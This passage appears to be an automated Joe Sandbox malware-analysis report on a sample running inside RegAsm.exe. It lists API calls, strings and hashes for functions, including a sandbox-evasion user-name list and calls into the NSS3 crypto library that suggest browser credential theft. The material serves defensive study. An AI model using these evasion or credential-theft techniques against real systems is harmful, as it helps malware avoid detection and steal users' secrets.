                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: NameUserlstrcmpi
                                                                                                        • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
                                                                                                        • API String ID: 542268695-1784693376
                                                                                                        • Opcode ID: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
                                                                                                        • Instruction ID: b7e7ac9f27e83d335140a50ac772a364dc2a7579303695bb9c42e1fce2a6af08
                                                                                                        • Opcode Fuzzy Hash: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
                                                                                                        • Instruction Fuzzy Hash: B42103B094526C8BCB20CF159D4C6DDBBB5AB5D308F00B1DAD1886A210C7B85ED9CF4D
                                                                                                        Function 6C1EAF20 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 126COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_SignMessage), ref: 6C1EAF46
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1EAF74
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1EAF83
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1EAF99
                                                                                                        • PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C1EAFBE
                                                                                                        • PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C1EAFD9
                                                                                                        • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C1EAFF4
                                                                                                        • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C1EB00F
                                                                                                        • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C1EB028
                                                                                                        • PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C1EB041
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage$n,l
                                                                                                        • API String ID: 1003633598-302734074
                                                                                                        • Opcode ID: 821ceaa22a34489483cb027b5e14caf3d92c060ccbcc218d4c9b347a7defdd4f
                                                                                                        • Instruction ID: 6a298340133b6bcc9612681f21ec807a2858a91246670c1b0c586ca917912baa
                                                                                                        • Opcode Fuzzy Hash: 821ceaa22a34489483cb027b5e14caf3d92c060ccbcc218d4c9b347a7defdd4f
                                                                                                        • Instruction Fuzzy Hash: FF41E275601248EFDB00CF54DD89F8A3BB5EB4A31DF094068FC08A7A11DB35E858CBA6
                                                                                                        Function 6C1E08F0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 230COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C1E094D
                                                                                                        • htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1E0953
                                                                                                        • htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6C1E096E
                                                                                                        • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6C1E0974
                                                                                                        • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C1E098F
                                                                                                        • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C1E0995
                                                                                                          • Part of subcall function 6C1E1800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C1E1860
                                                                                                          • Part of subcall function 6C1E1800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C1E09BF), ref: 6C1E1897
                                                                                                          • Part of subcall function 6C1E1800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C1E18AA
                                                                                                          • Part of subcall function 6C1E1800: memcpy.VCRUNTIME140(?,?,?), ref: 6C1E18C4
                                                                                                        • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C1E0B4F
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C1E0B5E
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C1E0B6B
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6C1E0B78
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
                                                                                                        • String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
                                                                                                        • API String ID: 1637529542-763765719
                                                                                                        • Opcode ID: 52e7acb7a5cc55a46852343100e2dbe6f1e20d186d4f0fd8ee5af9e93ade40b4
                                                                                                        • Instruction ID: f5656fba612720b0c65185ffd1743aa84dbaa1fc54d52ba7754668aa5c5d262c
                                                                                                        • Opcode Fuzzy Hash: 52e7acb7a5cc55a46852343100e2dbe6f1e20d186d4f0fd8ee5af9e93ade40b4
                                                                                                        • Instruction Fuzzy Hash: B2817876604705AFC700CF54C880A9AF7E9FF8C608F048919F99997752EB31EA19CB92
                                                                                                        Function 0041260C Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 204stringprocesssynchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • _memset.LIBCMT ref: 004127B1
                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?), ref: 004127C3
                                                                                                        • lstrcatA.KERNEL32(?,00436698), ref: 004127D5
                                                                                                        • lstrcatA.KERNEL32(?,e90840a846d017e7b095f7543cdf2d15), ref: 004127E7
                                                                                                        • lstrcatA.KERNEL32(?,0043669C), ref: 004127F9
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00412809
                                                                                                        • lstrcatA.KERNEL32(?,004366A0), ref: 0041281B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00412824
                                                                                                        • lstrcatA.KERNEL32(?,EMPTY), ref: 00412840
                                                                                                        • lstrcatA.KERNEL32(?,004366AC), ref: 00412852
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00412862
                                                                                                        • lstrcatA.KERNEL32(?,004366B0), ref: 00412874
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00412881
                                                                                                        • _memset.LIBCMT ref: 004128B7
                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,004366B4,?), ref: 00412924
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00412932
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
                                                                                                        • String ID: .exe$EMPTY$e90840a846d017e7b095f7543cdf2d15
                                                                                                        • API String ID: 141474312-4223934599
                                                                                                        • Opcode ID: 7423630355bc0ae080dcc3895a676b474c595fadf28ca0ec63f6465bb34c18d8
                                                                                                        • Instruction ID: 30b7237e4d63740a0c3ffa21d4e9ba1d0fd5571b7a7901b34f1eecf9535dda31
                                                                                                        • Opcode Fuzzy Hash: 7423630355bc0ae080dcc3895a676b474c595fadf28ca0ec63f6465bb34c18d8
                                                                                                        • Instruction Fuzzy Hash: 99814FB2E40129ABCF11EF61DD46ACD7779AB08309F4054BAB708B3051D679AFC98F58
                                                                                                        Function 6C1F2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C1F2DEC
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C1F2E00
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C1F2E2B
                                                                                                        • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C1F2E43
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C1C4F1C,?,-00000001,00000000,?), ref: 6C1F2E74
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C1C4F1C,?,-00000001,00000000), ref: 6C1F2E88
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C1F2EC6
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C1F2EE4
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C1F2EF8
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F2F62
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1F2F86
                                                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6C1F2F9E
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F2FCA
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1F301A
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1F302E
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F3066
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1F3085
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F30EC
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1F310C
                                                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6C1F3124
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F314C
                                                                                                          • Part of subcall function 6C1D9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C20379E,?,6C1D9568,00000000,?,6C20379E,?,00000001,?), ref: 6C1D918D
                                                                                                          • Part of subcall function 6C1D9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C20379E,?,6C1D9568,00000000,?,6C20379E,?,00000001,?), ref: 6C1D91A0
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1F316D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 3383223490-0
                                                                                                        • Opcode ID: 7d73cb6d8d216de108ebca5f9778063a2f939ef1b9b204840820a5f6988250bf
                                                                                                        • Instruction ID: ca3c243dfb2af8234015162d993841b7ef89409faf39327085bc7a8d3663e718
                                                                                                        • Opcode Fuzzy Hash: 7d73cb6d8d216de108ebca5f9778063a2f939ef1b9b204840820a5f6988250bf
                                                                                                        • Instruction Fuzzy Hash: 52F19DB5E002089FEF00DFA8D844B9EBBB4BF19318F544169EC15A7711E731E996CB91
                                                                                                        Function 6C1E8820 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_DecryptVerifyUpdate), ref: 6C1E8846
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E8874
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E8883
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E8899
                                                                                                        • PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C1E88BA
                                                                                                        • PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C1E88D3
                                                                                                        • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C1E88EC
                                                                                                        • PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C1E8907
                                                                                                        • PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C1E8979
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptVerifyUpdate$n,l
                                                                                                        • API String ID: 1003633598-607707077
                                                                                                        • Opcode ID: f7524008233e507146b7c65648287fa22c6f8c41e9f61862a148ad64a5146d9f
                                                                                                        • Instruction ID: 9aa297733d199099b614143a60adaa5ad4e9e541cf548e0d942b09b544b24845
                                                                                                        • Opcode Fuzzy Hash: f7524008233e507146b7c65648287fa22c6f8c41e9f61862a148ad64a5146d9f
                                                                                                        • Instruction Fuzzy Hash: 6441E675A01148EFEB00CF58DD49F8A7BB5EB9B31CF094065EC08A7A11DB35A918CBD2
                                                                                                        Function 6C1E6D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_Digest), ref: 6C1E6D86
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E6DB4
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E6DC3
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E6DD9
                                                                                                        • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C1E6DFA
                                                                                                        • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C1E6E13
                                                                                                        • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C1E6E2C
                                                                                                        • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C1E6E47
                                                                                                        • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C1E6EB9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$n,l
                                                                                                        • API String ID: 1003633598-262512049
                                                                                                        • Opcode ID: 6b43878ba48ff9d0521c74c7d3e3d4dd3b715e52f01569011025c57fcd80f02e
                                                                                                        • Instruction ID: 29fe2887aefbed7fbf8837b3349065fd37e4178703a19e6dda9d7f9359d713ea
                                                                                                        • Opcode Fuzzy Hash: 6b43878ba48ff9d0521c74c7d3e3d4dd3b715e52f01569011025c57fcd80f02e
                                                                                                        • Instruction Fuzzy Hash: 2341E275A0114CAFDB00DF54DD4AF8A3BB9EB56719F854028FD08E7A12DB35A818CBD2
                                                                                                        Function 6C1F4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1F4C4C
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1F4C60
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4CA1
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C1F4CBE
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4CD2
                                                                                                        • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4D3A
                                                                                                        • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4D4F
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4DB7
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1F4DD7
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1F4DEC
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F4E1B
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1F4E2F
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4E5A
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1F4E71
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F4E7A
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F4EA2
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1F4EC1
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1F4ED6
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1F4F01
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F4F2A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
